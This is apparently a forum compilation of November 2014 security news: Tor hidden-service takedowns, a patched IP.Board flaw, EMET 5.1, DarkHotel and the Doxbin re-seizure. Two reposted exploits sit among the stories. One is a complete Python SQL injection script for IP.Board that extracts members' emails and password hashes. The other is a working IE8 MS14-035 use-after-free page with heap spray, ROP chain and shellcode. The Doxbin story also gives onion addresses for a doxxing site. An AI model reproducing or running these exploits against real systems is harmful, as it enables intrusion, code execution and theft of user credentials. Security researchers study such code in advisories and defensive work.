[h=2]Tor Project Mulls How Feds Took Down Hidden Websites[/h] HughPickens.com writes: Jeremy Kirk writes at PC World that in the aftermath of U.S. and European law enforcement shutting down more than 400 websites (including Silk Road 2.0) which used technology that hides their true IP addresses, Tor users are asking: How did they locate the hidden services? "The first and most obvious explanation is that the operators of these hidden services failed to use adequate operational security," writes Andrew Lewman, the Tor project's executive director. For example, there are reports of one of the websites being infiltrated by undercover agents, and one affidavit states various operational security errors. Another explanation is exploitation of common web bugs like SQL injections or RFIs (remote file inclusions). Many of those websites were likely quickly-coded e-shops with a big attack surface. Exploitable bugs in web applications are a common problem, says Lewman, adding that there are also ways to link transactions and deanonymize Bitcoin clients even if they use Tor. "Maybe the seized hidden services were running Bitcoin clients themselves and were victims of similar attacks." However, the number of takedowns and the fact that Tor relays were seized could also mean that the Tor network was attacked to reveal the location of those hidden services. "Over the past few years, researchers have discovered various attacks on the Tor network. We've implemented some defenses against these attacks (PDF), but these defenses do not solve all known issues and there may even be attacks unknown to us." Another possible Tor attack vector could be the Guard Discovery attack. The guard node is the only node in the whole network that knows the actual IP address of the hidden service, so if the attacker manages to compromise the guard node or somehow obtain access to it, she can launch a traffic confirmation attack to learn the identity of the hidden service. 
"We've been discussing various solutions to the guard discovery attack for the past many months but it's not an easy problem to fix properly. Help and feedback on the proposed designs is appreciated." According to Lewman, the task of hiding the location of low-latency web services is a very hard problem and we still don't know how to do it correctly. It seems that there are various issues that none of the current anonymous publishing designs have really solved. "In a way, it's even surprising that hidden services have survived so far. The attention they have received is minimal compared to their social value and compared to the size and determination of their adversaries." Source: Tor Project Mulls How Feds Took Down Hidden Websites - Slashdot
-
For those who complain about vBulletin: "This year, IPS released a total of four security updates to address cross-site scripting (XSS), file inclusion and other vulnerabilities found in IP.Board."
-
Robolinux 7.7.1 Is Now Probably the Most Illegal Operating System – Gallery A new version of Robolinux is now ready for download By Silviu Stahie on November 10th, 2014 17:31 GMT Robolinux, a fast and easy to use Linux distribution based on Debian that uses both the GNOME and Xfce desktop environments, has been updated to version 7.7.1. Robolinux has made a name for itself by claiming that it can help users migrate from Windows to Linux without having to drop their favorite applications. A tool called Stealth VM Software has been developed to that effect and it basically lets users launch their apps in a Windows virtual environment. As you can imagine, this is not exactly easy to do and you will need a powerful operating system. Even so, it's still unclear what the legal status of the solution chosen by the developer is. As usual, each new Robolinux release is about something else, be it full hard disk encryption, Windows compatibility, or some other feature. This latest iteration of the operating system is about the integration of Popcorn Time and users’ ability to watch online movies and TV shows. The legal status of Robolinux 7.7.1 is now even more unclear The implementation of a Windows virtual environment is shady enough, especially for a Linux distro. Now, it looks like the developer has implemented Popcorn Time by default, which is illegal in many countries. Not everyone has a problem with the application, but some people might use it in countries where it’s breaking laws. "Now you can enjoy watching thousands of live streaming TV Shows & Movies instantly on your PC or laptop. You can even Chromecast them directly to your TV. The Fast as Greased Lightning Robolinux XFCE version 7.7.1 details: [Please note: The Live version password is 'live' all lower case.]" "We added Popcorn Time which requires the newest Debian 2.19 C libraries. 
We also added Xarchiver, so it is easier for our Users to create archive files in dozens of formats, DNS Utils, for SysAdmins & two more custom BCM Wifi Drivers. Plus all Debian upstream security updates along with the latest new and improved Debian stable Version 7.7 kernel and the newest Oracle VirtualBox version," writes the developer in the announcement. The Linux Live Creator Windows executable files have been added to the download section in the FAQ web page and Windows users will now be able to choose between Unetbootin and Linux Live Creator to install Robolinux from a USB stick. More details about the Stealth VM Software and Robolinux can be found in the official changelog. Also, you can download Robolinux 7.7.1 right now from Softpedia for both 32-bit and 64-bit architectures. Source: Robolinux 7.7.1 Is Now Probably the Most Illegal Operating System – Gallery - Softpedia
-
IP.Board <= 3.4.7 SQL Injection

#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway () safe-mail net
# IP.Board <= 3.4.7 SQLi (blind, error based);
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
url = 'http://target.tld/forum/'
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sys, re
# <socks> - http://sourceforge.net/projects/socksipy/
#import socks, socket
#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
#socket.socket = socks.socksocket
# </socks>
import urllib2, urllib

def inject(sql):
    try:
        urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
    except urllib2.HTTPError, e:
        if e.code == 503:
            data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
            # the ':(' of the capture group was eaten by the forum's smiley filter in the posted copy
            txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
            if txt is not None:
                return txt.group(1)
            sys.exit('Error [3], received unexpected data:\n%s' % data)
        sys.exit('Error [1]')
    sys.exit('Error [2]')

def get(name, table, num):
    sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
    s = int(inject('LENGTH((%s))' % sqli))
    if s < 31:
        return inject(sqli)
    else:
        r = ''
        for i in range(1, s+1, 31):
            r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
        return r

n = inject('SELECT COUNT(*) FROM members')
print '* Found %s users' % n
for j in range(int(n)):
    print get('member_id', 'members', j)
    print get('name', 'members', j)
    print get('email', 'members', j)
    print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j)
    print '----------------'

Source: Full Disclosure: IP.Board <= 3.4.7 SQL Injection
-
SQL Injection Vulnerability Patched in IP.Board Forum Software By Eduard Kovacs on November 10, 2014 Invision Power Services (IPS) has released patches to address an SQL injection vulnerability affecting versions 3.3.x and 3.4.x of the popular online forum software IP.Board. IPS learned of the existence of an exploit for the vulnerability on Sunday when it published a post advising users to disable the IPS Connect service, which allows multiple sites to share one login, by deleting the "interface/ipsconnect/ipsconnect.php" file from their installations. "Most clients will not need this service but if you do use it then we still suggest you temporarily disable until a fix is released tomorrow," IPS said. Patches and additional details on the SQL injection vulnerability were released a few hours later. According to developers, SQL injection attacks are possible on certain PHP configurations. "Although this exploit requires some knowledge of your configuration and for certain files to be web-readable, we felt it important to release an update," IPS explained. An exploit written in Python was published on several websites on Sunday. According to the author of the exploit, the error-based blind SQL injection flaw affects IP.Board version 3.4.7 and earlier. One of the administrators of the vpsBoard forum claims IPS only learned of the existence of the exploit after he notified them. A vpsBoard member said he successfully tested the exploit on his own website by knowing only the URL. "I ran the exploit against my IPB and it injected SQL just fine - no 'knowledge' was needed other than the URL," the user with the online moniker raindog308 said. IP.Board developers have also learned "that it may be possible to send attachments via the email classes which would ordinarily be removed." A fix for this issue, reported privately to IPS by Andrew Erb, is also included in the patches. 
The patches are automatically applied for IPS Community in the Cloud customers running IP.Board 3.3 or above. Users who have installed or upgraded their installations to version 3.4.7 after the patches were released don't need to take any action since the main download files have been updated. This year, IPS released a total of four security updates to address cross-site scripting (XSS), file inclusion and other vulnerabilities found in IP.Board. Source: SQL Injection Vulnerability Patched in IP.Board Forum Software | SecurityWeek.Com
-
[h=3]EMET 5.1 is available[/h] swiat 10 Nov 2014 8:45 AM
Today, we’re releasing the Enhanced Mitigation Experience Toolkit (EMET) 5.1 which will continue to improve your security posture by providing increased application compatibility and hardened mitigations. You can download EMET 5.1 from microsoft.com/emet or directly from here. Following is the list of the main changes and improvements:
Several application compatibility issues with Internet Explorer, Adobe Reader, Adobe Flash, and Mozilla Firefox and some of the EMET mitigations have been solved.
Certain mitigations have been improved and hardened to make them more resilient to attacks and bypasses.
Added a “Local Telemetry” feature that allows memory dumps to be saved locally when a mitigation is triggered.
All the changes in this release are listed in Microsoft KB Article 3015976. If you are using Internet Explorer 11, either on Windows 7 or Windows 8.1, and have deployed EMET 5.0, it is particularly important to install EMET 5.1 as compatibility issues were discovered with the November Internet Explorer security update and the EAF+ mitigation. Alternatively, you can temporarily disable EAF+ on EMET 5.0. Details on how to disable the EAF+ mitigation are available in the User Guide. In general we recommend upgrading to the latest version of EMET to benefit from all the enhancements. We want to particularly thank Luca Davi, Daniel Lehmann, and Ahmad-Reza Sadeghi from System Security Lab at Technical University Darmstadt/CASED, and René Freingruber from SEC Consult for partnering with us. Your feedback is always welcome as it helps us improve EMET with each new release, so we encourage you to reach out using the Connect Portal or by sending an email to emet_feedback@microsoft.com. - The EMET Team
Source: EMET 5.1 is available - Security Research & Defense - Site Home - TechNet Blogs
-
Becoming a Hacker – Intangible Skills By Ethical Hacking Posted in: EH Tips, Hacking
How to become a hacker has created a buzz among IT security students and professionals; people have selected ehacking.net (via email, comments, Tweets etc.) as their mentor and we will surely help you out. In the previous episode of this series, we discussed the objective of this guide, the education and skills that are required, and the method to become a master; in this episode we will take a look at the philosophical and psychological side of a penetration tester. You might be thinking that the hacking process has nothing to do with philosophy and psychology, but believe me, it does; apart from the technical skills, the success of any hacking attack also depends on the psyche of the attacker.
Intangible Skills
“Focus” is the key to success in every aspect of life; be focused on what you want to achieve. Let's consider an example: you want to find a vulnerability in Facebook; you tried your level best, you were trying to achieve the objective, but you failed. The word failure shows your weakness, so please hide it or destroy it; you can't fail as long as you keep trying. “You only fail when you accept your defeat.” The foremost skill to become a penetration tester is to never ever give up and to be focused on achieving your objective. If you are able to develop this skill then take my word: “nobody can stop you from becoming a hacker/IT security expert”. Let's get back to the example; finding a vulnerability in Facebook takes time, patience, persistence and attention, and believe me, it is possible. Keep trying until you succeed; the same suggestion applies to this guide too: don't show impatience, read and implement. Are you developing the skills discussed in the first episode? Has a mentor been selected yet? Are you trying (focused) to become a hacker? We have discussed many important points so far that could lead you to success, if you can understand these points.
Attitude, Values, Culture
Winning, success and achieving the objective are all part of the attitude of a hacker mindset; the values are to care and to learn. Learning is very essential: you need to learn new skills, the latest technology and everything, so make reading your habit. Limited resources and unlimited wants; in hacking culture you have to believe that everything is possible, and that you, yes you, are the master of your own. Increase your capacity for learning and develop problem-solving skills; start with basic mathematics, move to algorithms, functions and so on. Remember, resources are limited but your wants are unlimited; you need to fulfill your wants either by limiting your needs (not recommended) or by increasing your capacity (highly recommended). Don't ever indulge yourself in repetitive tasks which you will soon find boring; your attitude should show that you are creative, because you have the creativity to understand the working and process of everything, and yes, you can make amendments to enhance or destroy the system (this is your attitude).
Freedom & Competency
You need freedom, you want freedom and you love freedom; act on this and demonstrate this. You are competent and you need to prove it; select your benchmark, work, achieve higher than it, and judge and rate yourself. Make yourself prepared for the real competition; you should not be afraid of competition; you are creative, you are competent (this is your value, and you have to prove it). Develop and sharpen your core competency; your core competency is the one thing you do best and at which nobody can beat you. Make this world believe in you by showing your competency, and you will become the mentor of many.
Conclusion
Let's close another chapter. I need your feedback; I also need to know how you are performing, and whether you are getting the right direction. Share your words. Incorporate the aforementioned skills into your daily life; if you just read and forget then you will achieve nothing; as discussed, be focused, learn and implement.
In the next article we will discuss the technical skills that are required to become a hacker/information security professional. Source: Becoming a Hacker – Intangible Skills | Ethical Hacking-Your Way To The World Of IT Security
-
[h=1]A Full Stack WYSIWYG Editor[/h] [h=1]for Network Packets[/h] [h=3]Edit L1 - L7 with just a few clicks[/h] [h=2]Features[/h] [h=3]Simple Interface[/h] Edit any packet at any layer from L1 to L7 with just a few mouse clicks. No hacking required. No need to look at Hex dumps. [h=3]Deep Understanding[/h] WireEdit knows all mandatory/optional elements of a packet, their data types, encoding, inter-dependency, position offsets, value constraints, checksums, etc. [h=3]Just works[/h] As you're editing, WireEdit takes care of all the behind-the-scenes details on the fly. No need to think about any of it. Source: https://wireedit.com/
-
Dark Net hackers steal seized site back from the FBI By Patrick Howell O'Neill Twitter on November 10, 2014 There's a tug of war at play on the Dark Net. Last week, American and European law enforcement triumphantly took control of 27 Dark Net websites in the highly publicized Operation Onymous, a campaign against a wide variety of Tor hidden services and their operators, including so-called Silk Road 2.0 and its alleged boss, 26-year-old Blake Benthall. Now, the new owners of one seized hidden website have taken their website back from police. The re-seized hidden service, Doxbin, is fully operational as of 1pm ET. Doxbin is a website dedicated to hosting tens of thousands of records containing sensitive information about private individuals, such as addresses, phone numbers, and Social Security Numbers. It’s made headlines numerous times, most notably recently when the judge in the trial of the original Silk Road, which was shuttered by the FBI last year, was threatened on the site, and her address, phone number, and personal details made public. The loss of Doxbin last week was mourned by the site’s fans. RIP doxbin pic.twitter.com/nFbrHoyVil — Anonymous (@blackplans) November 8, 2014 RIP Silk Road 2.0, doxbin, along with many other sites. Your legacy remains. pic.twitter.com/joT8aYyDad — john (@Anxieties) November 7, 2014 While police took control of the sites, the actual owners remain free and are speaking out in public. Earlier this weekend, they released aggregate log reports to the public in hopes that observers could identify the weakness that police used to seize the hidden service. Now, Doxbin's previous owners have handed off control of their website to an "interested party" who has re-seized the website and at least three .onion addresses that direct to it, according to records at the hidden service search engine ahmia.fi. Moreover, the new owners have created a brand new .onion address in order to prevent police from re-seizing Doxbin. 
Anyone can currently access Doxbin at http://npieqpvpjhrmdchg.onion/ and http://doxbinumfxfyytnh.onion/, two previously seized addresses. Another .onion has been added at http://doxbinrqbk7lcslw.onion/. While the backbone required to take a website back from the police has been applauded by some observers, re-seizing the website isn’t necessarily challenging from a technical perspective. An .onion address is simply a hash of a private key used to control the domain. The previous owners handed the private key off, and so now both police and the new owners of Doxbin possess the private key. That means that each can seize the domain at will, hence the game of tug of war. .@chobopeon The private_keys were handed to an interested party, who is playing tug of war with ICE/Eurolol. We're not involved — nachash (@loldoxbin) November 10, 2014 While the re-seizure is likely temporary, the website is now able to advertise a new and not-yet-seized address to its old users. Last week, the website looked like this after police action: RIP DOXBIN pic.twitter.com/DW43ex4CCn — Jeb Boone (@JebBoone) November 7, 2014 Now, a mirror of the site called “THE INDESTRUCTIBLE SKY CASTLE” revives the old Doxbin: Clarification: This article has been updated with new language to clarify ownership of the new Doxbin sites. Photo by David Goehring (CC BY 2.0) Source: Dark Net hackers steal seized site back from the FBI
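As an added illustration (not part of the Daily Dot article) of why holding the key is the same as holding the name: a v2 .onion address is derived from the service's RSA public key (the first 80 bits of SHA-1 over the DER-encoded key, base32-encoded), so anyone with the matching private key can publish a descriptor for that address. The two DER blobs below are constructed placeholders, not real Tor keys:

```python
"""Derive a v2 .onion address from a hidden service's public key and check
whether a given address belongs to a key. Added example, not the article's
or the Tor project's code; KEY_A and KEY_B are constructed byte strings
standing in for DER-encoded RSA public keys."""
import base64
import hashlib
import re

# A v2 onion name is 16 base32 characters: a-z and 2-7.
ONION_V2_RE = re.compile(r"^[a-z2-7]{16}$")


def onion_v2_address(public_key_der: bytes) -> str:
    """Return the 16-character v2 onion name for a DER-encoded RSA public key."""
    digest = hashlib.sha1(public_key_der).digest()  # 160-bit SHA-1 of the DER key
    truncated = digest[:10]                          # keep only the first 80 bits
    return base64.b32encode(truncated).decode("ascii").lower()


def matches_onion_address(public_key_der: bytes, address: str) -> bool:
    """True if `address` (with or without a trailing .onion) belongs to this key.

    This is the check a relay operator or investigator can do offline: the name
    is a pure function of the public key, so no descriptor lookup is needed.
    """
    name = address.strip().lower()
    if name.endswith(".onion"):
        name = name[: -len(".onion")]
    if not ONION_V2_RE.match(name):
        return False
    return onion_v2_address(public_key_der) == name


# Constructed sample "keys": arbitrary DER-looking bytes, not real RSA keys.
KEY_A = b"\x30\x48\x02\x41\x00" + bytes(range(1, 65)) + b"\x02\x03\x01\x00\x01"
KEY_B = b"\x30\x48\x02\x41\x00" + bytes(range(65, 1, -1)) + b"\x02\x03\x01\x00\x01"

if __name__ == "__main__":
    addr = onion_v2_address(KEY_A)
    print(addr + ".onion")
    print(matches_onion_address(KEY_A, addr + ".onion"))  # True: same key, same name
    print(matches_onion_address(KEY_B, addr + ".onion"))  # False: a different key
```

Two parties holding the same private key therefore produce, and can both serve, exactly the same name; only the new, third address in the article is outside the seized key's reach.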
-
Radare – The Reverse Engineering Framework
Radare started out as a simple command line interface for a hexadecimal editor supporting 64 bit offsets to make searches and recover data from hard-disks. It has evolved into a project that is composed of a hexadecimal editor as the central point of the project with assembler/disassembler, code analysis, scripting features, analysis and graphs of code and data and easy unix integration. Essentially, it has become a reverse engineering framework, with plugins and much more.
radare2 itself is the core of the hexadecimal editor and debugger. It allows opening any kind of file through different IO access methods like disk, network, kernel plugins, remote devices and debugged processes, and handling any of them as if they were a simple plain file. It implements an advanced command line interface for moving around the file, analyzing data, disassembling, binary patching, data comparison, searching, replacing, and scripting with Ruby, Python, Lua and Perl.
Features
CLI and visual modes
Yank and paste
Perl/Python scripting support
Virtual base address for on-disk patching
vi-like environment and command repetition (3x)
Debugger for x86-linux/bsd and arm-linux
Data bookmarking (flags)
Scripting (no branches or conditionals yet)
Own magic database (rfile)
Little/big endian conversions
Data search
Show xrefs on arm, x86 and ppc binaries
Data type views
Data block views
Visual mode commands
You can download radare here: radare2-0.9.7.tar.xz Or read more here – the author can be found on Twitter here @trufae. Source: Radare - The Reverse Engineering Framework - Darknet - The Darkside
-
“DarkHotel” uses bogus crypto certificates to snare Wi-Fi-connected execs Malware operators know in advance when targeted fat cats will check in and out. by Dan Goodin - Nov 10 2014, 11:20pm GTBST DeviantArt user: Tincho555 Researchers have uncovered a seven-year-old malware operation that combines advanced cryptographic attacks, zero-day exploits, and well-developed keyloggers to target elite executives staying in luxury hotels during business trips. The attackers behind "DarkHotel," as the advanced persistent threat has been dubbed, appear to know in advance when a targeted exec will check in and check out of a hotel. Victims are infected through a variety of methods, including bogus software updates for Adobe Flash, Google Toolbar, or other trusted software that are presented when the exec uses the hotel's Wi-Fi or wired Internet access. In many cases, the attack code is signed with a trusted digital certificate that the attackers were able to clone by factoring the underlying 512-bit private key. While factoring weak 512-bit keys has been practical for several years, the crypto attack nonetheless is an "advanced" capability, particularly a few years ago. Taken together, the characteristics are an indication the operators have some sophistication, said researchers from Kaspersky Lab, the Russia-based security firm that disclosed the campaign. "The fact that most of the time the victims are top executives indicates the attackers have knowledge of their victims whereabouts, including name and place of stay," the researchers wrote in a report published Monday. "This paints a dark, dangerous web in which unsuspecting travelers can easily fall. While the exact reason why some hotels function as an attacker vector are unknown, certain suspicions exist, indicating possibly a much larger compromise. We are still investigating this aspect of the operation and will publish more information in the future." 
Kaspersky researchers observed DarkHotel malware spreading in several undisclosed hotel networks when people connected to Wi-Fi were prompted to install counterfeit software updates. In other cases, targets are infected through spearphishing messages, some of which include attack code exploiting previously unknown vulnerabilities in Flash, Internet Explorer, or other types of software. Once infected by DarkHotel, computers will install various keyloggers or other forms of malware that are tailored to specific victims. The malware monitors passwords, communications, and system information on infected machines and periodically sends the data in encrypted form to servers controlled by the attackers. One of the things that makes the campaign unusual is its use of luxury hotel networks as a watering hole of sorts to target and infect high-value executives. The report stated: In this case, the Darkhotel attackers wait for their victim to connect to the Internet over the hotel Wi-Fi or the cable in their room. There is a very strong likelihood the targets will connect over these resources, and the attackers rely on that likelihood, much like at a watering hole. But the attackers also maintain truly precise targeting information over the victim’s visit, much like they would know a victim’s e-mail address and content interests in a spearphishing attack. While setting up the attack, the Darkhotel attackers knew the target’s expected arrival and departure times, room number, and full name, among other data. This data enables the attackers to present the malicious iframe precisely to that individual target. So, here we have yet another unique characteristic of this attacker—they employ a loosely certain but highly precise offensive approach. DarkHotel malware was also seeded to bittorrent feeds, where it was downloaded more than 30,000 times in less than six months. 
Kaspersky-owned network sensors have detected "thousands" of DarkHotel infections, mostly from the bittorrent feeds. Japan, Taiwan, China, Russia, and Korea were the five countries most affected by the malware. Kaspersky Lab Much of the malware is or was cryptographically signed with digital certificates belonging to a trusted third party. All of the underlying private keys of the cloned certificates were generated using 512-bit md5 keys. The ability of attackers to factor the weak keys for use in such malware attacks has long been known, as advisories issued from Fox-IT, Microsoft, Mozilla, and Entrust warned in 2011. All the cloned keys have expired or been revoked. Signing code with trusted certificates helps eliminate warning messages that may be presented during installation. "All related cases of signed Darkhotel malware share the same Root Certificate Authority and Intermediate Certificate Authority that issued certificates with weak md5 keys (RSA 512 bits)," Monday's Kaspersky report stated. "We are confident that our Darkhotel threat actor fraudulently duplicated these certificates to sign its malware. These keys were not stolen." More recently, DarkHotel operators have stolen third-party certificates to sign their malware. Some of the DarkHotel malware samples date back to 2007. One file includes a keylogger designed to resemble a legitimate low-level Microsoft system device. Other components include a small downloader, an information stealer, a dropper and self-injector, and a "selective infector" that infects executable files with an old-fashioned virus. Source: “DarkHotel” uses bogus crypto certificates to snare Wi-Fi-connected execs | Ars Technica
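An added check (not Kaspersky's or Ars Technica's code) for the weak-key condition described above: read the RSA modulus out of a certificate's SubjectPublicKeyInfo and flag anything below a policy minimum, which catches the 512-bit keys behind the cloned DarkHotel signing certificates. The moduli are constructed values, not real keys, and the DER walker covers only the RSA SubjectPublicKeyInfo layout:

```python
"""Flag factorable RSA public keys in X.509 SubjectPublicKeyInfo (SPKI) DER.
Added example; the encoder exists only so the check can be exercised offline
on constructed moduli, and the decoder handles the RSA layout of RFC 3279."""
from typing import Tuple

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1
MIN_SAFE_RSA_BITS = 2048  # policy minimum; 512-bit keys were factorable in 2011


def _der_len(n: int) -> bytes:
    """DER length: short form below 128, else 0x80|count followed by the bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(body)) + body


def _der_int(value: int) -> bytes:
    body = value.to_bytes((value.bit_length() + 7) // 8 or 1, "big")
    if body[0] & 0x80:  # DER INTEGER is signed: pad so the value stays positive
        body = b"\x00" + body
    return _der(0x02, body)


def build_rsa_spki(modulus: int, exponent: int = 65537) -> bytes:
    """Encode SEQUENCE { AlgorithmIdentifier(rsaEncryption), BIT STRING { RSAPublicKey } }."""
    algorithm = _der(0x30, _der(0x06, RSA_ENCRYPTION_OID) + b"\x05\x00")
    rsa_key = _der(0x30, _der_int(modulus) + _der_int(exponent))
    return _der(0x30, algorithm + _der(0x03, b"\x00" + rsa_key))


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, body, position after this element) for the TLV at buf[pos]."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long-form length
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length


def rsa_modulus_bits(spki: bytes) -> int:
    """Return the RSA modulus size in bits, or 0 if this is not an RSA SPKI."""
    try:
        tag, outer, _ = _read_tlv(spki, 0)
        if tag != 0x30:
            return 0
        alg_tag, alg, pos = _read_tlv(outer, 0)
        oid_tag, oid, _ = _read_tlv(alg, 0)
        if alg_tag != 0x30 or oid_tag != 0x06 or oid != RSA_ENCRYPTION_OID:
            return 0
        bs_tag, bitstr, _ = _read_tlv(outer, pos)
        if bs_tag != 0x03 or bitstr[0] != 0:  # first BIT STRING byte = unused bits
            return 0
        _, rsa_key, _ = _read_tlv(bitstr, 1)
        int_tag, modulus, _ = _read_tlv(rsa_key, 0)
        if int_tag != 0x02:
            return 0
        return int.from_bytes(modulus, "big").bit_length()
    except IndexError:  # truncated or malformed DER
        return 0


def is_weak_rsa(spki: bytes, minimum_bits: int = MIN_SAFE_RSA_BITS) -> bool:
    """True when the key is RSA and smaller than the policy minimum."""
    bits = rsa_modulus_bits(spki)
    return 0 < bits < minimum_bits


if __name__ == "__main__":
    # Constructed moduli of the right size; not real keys.
    weak = build_rsa_spki((1 << 511) | 1)     # 512-bit, like the DarkHotel certs
    strong = build_rsa_spki((1 << 2047) | 1)  # 2048-bit
    for label, spki in (("512-bit", weak), ("2048-bit", strong)):
        print(label, rsa_modulus_bits(spki), "weak" if is_weak_rsa(spki) else "ok")
```

With a real certificate, feed the SubjectPublicKeyInfo bytes an X.509 library gives you (the element is identical); the signature digest (md5 versus sha256) lives in the certificate's signatureAlgorithm and is a separate check.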
-
[h=1]Internet Explorer 8 MS14-035 Use-After-Free Exploit[/h] <!-- Exploit Title: MS14-035 Use-after-free Exploit for IE8 Date: 10 Nov 2014 Exploit Author: Ayman Sagy <aymansagy@gmail.com> https://www.linkedin.com/in/aymansagy Tested on: IE8 with Java6 on Windows7 --> <html> <head><title>MS14-035 IE8 Use-after-free Exploit</title></head> <body> <!-- <APPLET id="dummy" code="dummy.class" width=100 height=100> You need to install Java to view this page. </APPLET> --> <div id="mydiv">x</div> <form id="frm"></form> <div id="sprayfrm"></div> <script type="text/javascript"> spraysize = 5000; sprayelement = document.getElementById("sprayfrm"); sprayelement.style.cssText = "display:none"; var data; offset = 0x506; buffer = unescape("%u2020%u2020"); pivot = unescape("%u8b05%u7c34"); // stack pivot // MSVCR71 rop = unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret; rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2} rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect rop += unescape("%u5645%u7c36"); // pop esi;ret; rop += unescape("%u5243%u7c34"); // ret; rop += unescape("%u8f46%u7c34"); // pop ebp;ret; rop += unescape("%u87ec%u7c34"); // call eax; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ufdff%uffff"); // {size} rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size} rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx} rop += unescape("%u39fa%u7c34"); // pop edx;ret; rop += unescape("%uffc0%uffff"); // {flag} rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag} rop += unescape("%u4648%u7c35"); // pop edi;ret; rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret; rop += unescape("%u4cc1%u7c34"); // pop eax;ret; rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment} rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret; rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret; rop += unescape("%u683f%u7c36"); // push 
esp;ret;
rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010

// calc
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163");

/*
       _______0x1cc_____
      |                 |
     \|/                |
 Junk ROP Shellcode Pivot Junk
       2       3      1
*/

while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");
buffer += rop;
buffer += shellcode;
while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");
while (buffer.length < 0x1000) buffer += buffer;

data = buffer.substring(0,offset) + pivot + rop + shellcode
data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);
while (data.length < 0x80000) data += data;

for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS
{
    var obj = document.createElement("button");
    obj.title = data.substring(0,0x40000-0x58);
    //obj.style.fontFamily = data.substring(0,0x40000-0x58);
    sprayelement.appendChild(obj);
}

block = unescape( // Literal string to avoid heap allocation
    "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
    "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
    "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
    "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
    "%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");

blocks = new Array();
for (i = 0; i < spraysize; i++) { // spray 1
    blocks.push(document.createElement("button"));
    blocks[i].setAttribute("title",block.substring(0, block.length));
    sprayelement.appendChild(blocks[i]);
}
for (i = spraysize/2; i < spraysize; i++) { // free some blocks
    blocks[i].setAttribute("title","");
}

var newdiv = document.createElement('div');
newdiv.innerHTML = "<textarea id='CTextArea'></textarea>";
document.getElementById("frm").appendChild(newdiv);
var newdiv2 = document.createElement('div');
newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";
document.getElementById("frm").appendChild(newdiv2);
document.getElementById("CInput").checked = true;
trigger = true;
document.getElementById("frm").reset();

function crash()
{
    if (trigger)
    {
        document.getElementById("frm").innerHTML = ""; // Free object, trigger bug
        CollectGarbage();
        for (i = spraysize/2; i < spraysize; i++) { // spray 2
            blocks[i].setAttribute("title",block.substring(0, block.length));
        }
    }
}
</script>
</body>
</html>

Sursa: http://www.exploit-db.com/exploits/35213/
